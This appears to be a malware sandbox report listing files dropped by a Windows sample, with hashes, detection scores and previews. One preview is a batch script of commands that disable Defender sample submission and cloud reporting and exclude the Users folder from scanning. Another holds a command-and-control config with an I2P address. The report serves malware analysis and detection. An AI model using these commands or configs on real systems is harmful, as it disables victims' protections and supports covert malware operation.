SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jw325bu.f34.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdztvjwq.dba.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chocavaz.i1l.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezvuco33.3ae.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hq1zzezj.tu2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdw3p2cu.2s3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqrwexta.wf5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_myab3lxr.ulf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbanz1us.epk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2440blv.jy0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrufdzzs.o4t.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\installer.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3744
Entropy (8bit):	5.507463213083565
Encrypted:	false
SSDEEP:	96:isYJ9VXDT0HU0Hn0H1D0Cc0He0H+kQHR3fPqve0HMVVHsHz0HMttHMy:DiTzT000H010Cc0+0TQxvPqve0AVMT0y
MD5:	DE133B012671471FDCFBF3B89907603D
SHA1:	6AEEE3BC5AC745594B946BE15E883FC7D2F74A7F
SHA-256:	8F7FFCA12815CD6D6ED5DCE65CD4C6DC0E29D2A0A8B0C3566C81F26F63911C2E
SHA-512:	EB3C0DD0134CD02975C32C6365FDE6200A015BD66858846311622CB37DD52334171DB0E68413AFE6FCE8C2732E62429CA38BE13CE8D253F8F7D784E83117E03C
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=571c4e6c)..[I] (sys_init) -> Done(sys_uid=c76a8f08571c4e6c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-10

C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe

Download File

Process:	C:\Users\user\Desktop\80P.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	10669056
Entropy (8bit):	7.443816651911507
Encrypted:	false
SSDEEP:	98304:RzfenAfcSl0KeEoTnZ4gBu8P1TAB3ruLIb9ly73Ji3vhqNDMmL98fjd3KiY9LeOm:gA/0F5PdyrlSQ5qNDMmYjd3RY9Lesc
MD5:	2F829F1CB631D234C54F2E6C6F72EB57
SHA1:	BD76CB633ED42E9E94580E1D995AF2E36D9E1A11
SHA-256:	09B3B106A22BCB2DF3F09C7A1A082F2FE62927C337C183D3813D21513FB3FA43
SHA-512:	71C0B077AA63B6DF3A1C2E0A1A0E179DA0466518F2BE6E10871642F03B3B8F63318258DA8C93B78E0CA45C753C3A6524751187FF3D5952D336BE3461651D0CD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*......................@.............................@.......6....`... ................................................................d............0..............................`...(....................................................text...............................`..`.data....J.......L..................@....rdata...^...P...`...<..............@..@.pdata..d...........................@..@.xdata..............................@..@.bss....p...............................idata.............................@....CRT....`..........................@....tls......... .....................@....reloc.......0.....................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat

Download File

Process:	C:\Users\user\Desktop\80P.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	259
Entropy (8bit):	4.933902901538645
Encrypted:	false
SSDEEP:	6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
MD5:	261A842203ADB67547C83DE132C7A076
SHA1:	6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
SHA-256:	49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
SHA-512:	7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
Malicious:	true
Preview:	@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1

C:\Windows\Temp\6DPA479I

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129536
Entropy (8bit):	6.2852879161990645
Encrypted:	false
SSDEEP:	1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
MD5:	88E6178B0CD434C8D14710355E78E691
SHA1:	F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
SHA-256:	7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
SHA-512:	C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."....<..........Y.........,...................................../....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

C:\Windows\Temp\9m9shiPj

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.236071662185895
Encrypted:	false
SSDEEP:	1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
MD5:	CE579A1BDCB9763DAFEBF01AD29F918C
SHA1:	F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
SHA-256:	0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
SHA-512:	EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............\|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

C:\Windows\Temp\I2Hoxnam

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.2041507656664825
Encrypted:	false
SSDEEP:	1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
MD5:	CB4F460CF2921FCD35AC53F4154FCBE0
SHA1:	AFD91433EF0C03315739FB754B16D6C49D2E51F2
SHA-256:	D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
SHA-512:	BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

C:\Windows\Temp\NCdDxWNe

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9146880
Entropy (8bit):	6.674868432808522
Encrypted:	false
SSDEEP:	196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:	676064A5CC4729E609539F9C9BD9D427
SHA1:	F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:	77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:	4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

C:\Windows\Temp\PZw3bxmd

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	75977
Entropy (8bit):	7.8696816318811385
Encrypted:	false
SSDEEP:	1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
MD5:	E53A179BB45CD7EDD8371740D65076BD
SHA1:	6B74034746E12C2058614A9DF671C31B79EAA7E9
SHA-256:	C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
SHA-512:	767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
Malicious:	false
Preview:	I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..\|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..\|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/

C:\Windows\Temp\TzijR9kt

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.25860377459178
Encrypted:	false
SSDEEP:	1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
MD5:	BD1D98C35FE2CB3E14A655AEDE9D4B01
SHA1:	49361C09F5A75A4E2D6E85FBDA337FC521770793
SHA-256:	961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
SHA-512:	74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

C:\Windows\Temp\bIMtvCd7

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:9:9
MD5:	006F29D8E822B9241020AEC2495EF819
SHA1:	6510BEB08A14B6BCC74D32031C1B19AA07169CF1
SHA-256:	69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
SHA-512:	16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
Malicious:	false
Preview:	wgNj

C:\Windows\Temp\cT0lRU9g

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [cnccli]
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.129024990254676
Encrypted:	false
SSDEEP:	6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
MD5:	7D88563AD41BAF4026CFC5D098CBF40D
SHA1:	442756834CCCEB84F219F3C762852437FBB3458E
SHA-256:	D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
SHA-512:	F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
Malicious:	false
Preview:	[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

C:\Windows\Temp\ia0qD2w9

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.229119632298774
Encrypted:	false
SSDEEP:	1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
MD5:	7FEA520E80E7A73252F2A5C204BBF820
SHA1:	557D33F75805669A6D5E98D0E6CD3B790ECF3464
SHA-256:	64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
SHA-512:	6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

C:\Windows\Temp\ieIgHN2A

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

C:\Windows\Temp\mbk77kmw

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	456534
Entropy (8bit):	5.450314708570292
Encrypted:	false
SSDEEP:	1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
MD5:	AC8B2EA4A310D6748A8845C235A3CDC8
SHA1:	0B489969C7D95411E4104B9BB952C0024EDE1616
SHA-256:	77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
SHA-512:	0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
Malicious:	false
